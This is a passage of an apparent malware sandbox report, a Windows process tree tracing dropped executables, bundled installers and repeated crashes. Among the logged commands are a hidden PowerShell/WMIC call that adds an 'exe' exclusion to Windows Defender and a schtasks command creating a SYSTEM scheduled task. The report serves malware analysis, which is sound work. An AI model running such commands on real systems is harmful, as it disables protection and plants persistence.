                                                                                                                                                PID:5100
                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                16⤵
                                                                                                                                                  PID:3864
                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                              14⤵
                                                                                                                                                PID:10332
                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                14⤵
                                                                                                                                                  PID:10492
                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                  14⤵
                                                                                                                                                    PID:10528
                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                    14⤵
                                                                                                                                                      PID:10560
                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                      14⤵
                                                                                                                                                        PID:10468
                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                    12⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:5620
                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                    12⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:9084
                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                    12⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:9328
                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                    12⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:9352
                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                    12⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:9456
                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                10⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:8008
                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                10⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:8040
                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                10⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:8064
                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                10⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:8116
                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                10⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:8156
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                            8⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:7012
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                            8⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:7092
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                            8⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:7048
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                            8⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:7184
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                            8⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:7196
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\s54sPhUD\RCAwbRvEExcoI1iGpak.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\s54sPhUD\RCAwbRvEExcoI1iGpak.exe
                                                                                                                                    4⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:4392
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-SUV7F.tmp\RCAwbRvEExcoI1iGpak.tmp
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-SUV7F.tmp\RCAwbRvEExcoI1iGpak.tmp" /SL5="$30518,4312075,54272,C:\Users\Admin\AppData\Local\Temp\s54sPhUD\RCAwbRvEExcoI1iGpak.exe"
                                                                                                                                      5⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                      PID:2740
                                                                                                                                      • C:\Users\Admin\AppData\Local\Free Video Player\freevideoplayer.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Free Video Player\freevideoplayer.exe" -i
                                                                                                                                        6⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        PID:2836
                                                                                                                                      • C:\Users\Admin\AppData\Local\Free Video Player\freevideoplayer.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Free Video Player\freevideoplayer.exe" -s
                                                                                                                                        6⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        PID:5180
                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 1952
                                                                                                                                    4⤵
                                                                                                                                    • Program crash
                                                                                                                                    PID:2416
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\L4amOxuk\NiKbjJ9KuLmluUYLXxAU.exe"
                                                                                                                                    4⤵
                                                                                                                                      PID:4056
                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\L4amOxuk\NiKbjJ9KuLmluUYLXxAU.exe"
                                                                                                                                        5⤵
                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        PID:2320
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 2476
                                                                                                                                      4⤵
                                                                                                                                      • Program crash
                                                                                                                                      PID:1440
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 2336
                                                                                                                                      4⤵
                                                                                                                                      • Program crash
                                                                                                                                      PID:3928
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 2324
                                                                                                                                      4⤵
                                                                                                                                      • Program crash
                                                                                                                                      PID:3836
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 2288
                                                                                                                                      4⤵
                                                                                                                                      • Program crash
                                                                                                                                      PID:5440
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 2224
                                                                                                                                      4⤵
                                                                                                                                      • Program crash
                                                                                                                                      PID:5488
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 2448
                                                                                                                                      4⤵
                                                                                                                                      • Program crash
                                                                                                                                      PID:5532
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\L4amOxuk\NiKbjJ9KuLmluUYLXxAU.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\L4amOxuk\NiKbjJ9KuLmluUYLXxAU.exe --silent --allusers=0
                                                                                                                                      4⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:5544
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS8A5B9D4A\setup.exe
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7zS8A5B9D4A\setup.exe --silent --allusers=0 --server-tracking-blob=ZDhkOWU4ZTg2YjY5ODdiOWE5YTZlZjUyMmY4NmViMTJiMmRiODg3NzYyYzlkMTRhZjNjMjIwZDY2YTJkY2RkMDp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijoib3BlcmEiLCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1SU1RQJnV0bV9jYW1wYWlnbj1vcDEzMiIsInRpbWVzdGFtcCI6IjE3MjExMDkyMzUuNjI5NiIsInVzZXJhZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8xMTguMC4wLjAgU2FmYXJpLzUzNy4zNiIsInV0bSI6eyJjYW1wYWlnbiI6Im9wMTMyIiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoiUlNUUCJ9LCJ1dWlkIjoiNWQ0ZGIxZDgtNThjYi00MjlhLWFkMmYtOTM4YjdjNDUzMDFkIn0=
                                                                                                                                        5⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Loads dropped DLL
                                                                                                                                        • Enumerates connected drives
                                                                                                                                        • Modifies system certificate store
                                                                                                                                        PID:5632
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS8A5B9D4A\setup.exe
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7zS8A5B9D4A\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=112.0.5197.24 --initial-client-data=0x304,0x308,0x30c,0x300,0x310,0x70c5b1f4,0x70c5b200,0x70c5b20c
                                                                                                                                          6⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Loads dropped DLL
                                                                                                                                          PID:5692
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe" --version
                                                                                                                                          6⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Loads dropped DLL
                                                                                                                                          PID:5820
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS8A5B9D4A\setup.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\7zS8A5B9D4A\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=5632 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240716055405" --session-guid=069d124f-7ab1-4421-ad03-01a0aca52e73 --server-tracking-blob=YzY2MDI2NjNiMTdhZTA4YmM2Y2U0NWRlODQ0YjU2YjFmZDRkOGE3ZGVjMTdiYjBkNmFiZGZmNWNhNjY1ZGIyMjp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1SU1RQJnV0bV9jYW1wYWlnbj1vcDEzMiIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcyMTEwOTIzNS42Mjk2IiwidXNlcmFnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExOC4wLjAuMCBTYWZhcmkvNTM3LjM2IiwidXRtIjp7ImNhbXBhaWduIjoib3AxMzIiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJSU1RQIn0sInV1aWQiOiI1ZDRkYjFkOC01OGNiLTQyOWEtYWQyZi05MzhiN2M0NTMwMWQifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=EC04000000000000
                                                                                                                                          6⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Loads dropped DLL
                                                                                                                                          • Enumerates connected drives
                                                                                                                                          PID:5924
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS8A5B9D4A\setup.exe
                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7zS8A5B9D4A\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=112.0.5197.24 --initial-client-data=0x2f8,0x2fc,0x300,0x2d4,0x310,0x6f82b1f4,0x6f82b200,0x6f82b20c
                                                                                                                                            7⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Loads dropped DLL
                                                                                                                                            PID:6044
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160554051\assistant\Assistant_111.0.5168.25_Setup.exe_sfx.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160554051\assistant\Assistant_111.0.5168.25_Setup.exe_sfx.exe"
                                                                                                                                          6⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:7432
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160554051\assistant\assistant_installer.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160554051\assistant\assistant_installer.exe" --version
                                                                                                                                          6⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Loads dropped DLL
                                                                                                                                          PID:7520
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160554051\assistant\assistant_installer.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160554051\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=111.0.5168.25 --initial-client-data=0x230,0x234,0x238,0x20c,0x23c,0x1319f88,0x1319f94,0x1319fa0
                                                                                                                                            7⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Loads dropped DLL
                                                                                                                                            PID:7552
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 2340
                                                                                                                                      4⤵
                                                                                                                                      • Program crash
                                                                                                                                      PID:5612
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 2492
                                                                                                                                      4⤵
                                                                                                                                      • Program crash
                                                                                                                                      PID:5680
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 2560
                                                                                                                                      4⤵
                                                                                                                                      • Program crash
                                                                                                                                      PID:5832
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 2616
                                                                                                                                      4⤵
                                                                                                                                      • Program crash
                                                                                                                                      PID:5868
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 2580
                                                                                                                                      4⤵
                                                                                                                                      • Program crash
                                                                                                                                      PID:5948
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\jMOteh8S\mHT1r8Xpkx3IA.exe"
                                                                                                                                      4⤵
                                                                                                                                        PID:6076
                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\jMOteh8S\mHT1r8Xpkx3IA.exe"
                                                                                                                                          5⤵
                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:5196
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jMOteh8S\mHT1r8Xpkx3IA.exe
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jMOteh8S\mHT1r8Xpkx3IA.exe /did=757674 /S
                                                                                                                                        4⤵
                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Enumerates system info in registry
                                                                                                                                        PID:5296
                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                                                                                                          5⤵
                                                                                                                                            PID:5452
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                              6⤵
                                                                                                                                                PID:5304
                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                                  7⤵
                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                  PID:4552
                                                                                                                                                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                    "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                                    8⤵
                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                    PID:5552
                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                              schtasks /CREATE /TN "bEtnHIcecDUtXwQuWS" /SC once /ST 05:55:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\jMOteh8S\mHT1r8Xpkx3IA.exe\" z0 /Rtdidb 757674 /S" /V1 /F
                                                                                                                                              5⤵
                                                                                                                                              • Drops file in Windows directory
                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                              PID:6212
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5296 -s 824
                                                                                                                                              5⤵
                                                                                                                                                PID:10668
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 2492
                                                                                                                                              4⤵
                                                                                                                                              • Program crash
                                                                                                                                              PID:1696
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 1648
                                                                                                                                              4⤵
                                                                                                                                              • Program crash
                                                                                                                                              PID:1440
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 2496
                                                                                                                                              4⤵
                                                                                                                                              • Program crash
                                                                                                                                              PID:6648
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 2568
                                                                                                                                              4⤵
                                                                                                                                              • Program crash
                                                                                                                                              PID:10336
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 2540
                                                                                                                                              4⤵
                                                                                                                                              • Program crash
                                                                                                                                              PID:10460
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 2656
                                                                                                                                              4⤵
                                                                                                                                                PID:10628
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 2688
                                                                                                                                                4⤵
                                                                                                                                                  PID:316
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 1584
                                                                                                                                                  4⤵
                                                                                                                                                    PID:8460
                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 2252
                                                                                                                                                    4⤵
                                                                                                                                                      PID:7300
                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                1⤵
                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                • Modifies registry class
                                                                                                                                                PID:3268
                                                                                                                                              • C:\Users\Admin\Desktop\setup_ZIccnliaeT.exe
                                                                                                                                                "C:\Users\Admin\Desktop\setup_ZIccnliaeT.exe"
                                                                                                                                                1⤵
                                                                                                                                                  PID:6384
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-QVD2I.tmp\setup_ZIccnliaeT.tmp
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-QVD2I.tmp\setup_ZIccnliaeT.tmp" /SL5="$50300,6111556,56832,C:\Users\Admin\Desktop\setup_ZIccnliaeT.exe"
                                                                                                                                                    2⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                    PID:6412
                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                      "C:\Windows\system32\schtasks.exe" /Delete /F /TN "dj_minor_adequate_7161"
                                                                                                                                                      3⤵
                                                                                                                                                        PID:6572
                                                                                                                                                      • C:\Users\Admin\AppData\Local\DJ Minor Adequate\djminoradequate.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\DJ Minor Adequate\djminoradequate.exe" 7c8e947828b1704c470f20016c0ff497
                                                                                                                                                        3⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:6580
                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6580 -s 688
                                                                                                                                                          4⤵
                                                                                                                                                          • Program crash
                                                                                                                                                          PID:6660
                                                                                                                                                  • C:\Users\Admin\Desktop\setup_ZIccnliaeT.exe
                                                                                                                                                    "C:\Users\Admin\Desktop\setup_ZIccnliaeT.exe"
                                                                                                                                                    1⤵
                                                                                                                                                      PID:6732
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-HUBI4.tmp\setup_ZIccnliaeT.tmp
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-HUBI4.tmp\setup_ZIccnliaeT.tmp" /SL5="$70300,6111556,56832,C:\Users\Admin\Desktop\setup_ZIccnliaeT.exe"
                                                                                                                                                        2⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                                        PID:6760
                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                          "C:\Windows\system32\schtasks.exe" /Delete /F /TN "dj_minor_adequate_7161"
                                                                                                                                                          3⤵
                                                                                                                                                            PID:7120
                                                                                                                                                          • C:\Users\Admin\AppData\Local\DJ Minor Adequate\djminoradequate.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\DJ Minor Adequate\djminoradequate.exe" 7c8e947828b1704c470f20016c0ff497
                                                                                                                                                            3⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:7128
                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 7128 -s 192
                                                                                                                                                              4⤵
                                                                                                                                                              • Program crash
                                                                                                                                                              PID:7216
                                                                                                                                                      • C:\Users\Admin\Desktop\setup_ZIccnliaeT.exe
                                                                                                                                                        "C:\Users\Admin\Desktop\setup_ZIccnliaeT.exe"
                                                                                                                                                        1⤵
                                                                                                                                                          PID:6844
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-OSSSC.tmp\setup_ZIccnliaeT.tmp
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-OSSSC.tmp\setup_ZIccnliaeT.tmp" /SL5="$A0228,6111556,56832,C:\Users\Admin\Desktop\setup_ZIccnliaeT.exe"
                                                                                                                                                            2⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                            PID:6872
                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                              "C:\Windows\system32\schtasks.exe" /Delete /F /TN "dj_minor_adequate_7161"
                                                                                                                                                              3⤵
                                                                                                                                                                PID:6972
                                                                                                                                                              • C:\Users\Admin\AppData\Local\DJ Minor Adequate\djminoradequate.exe
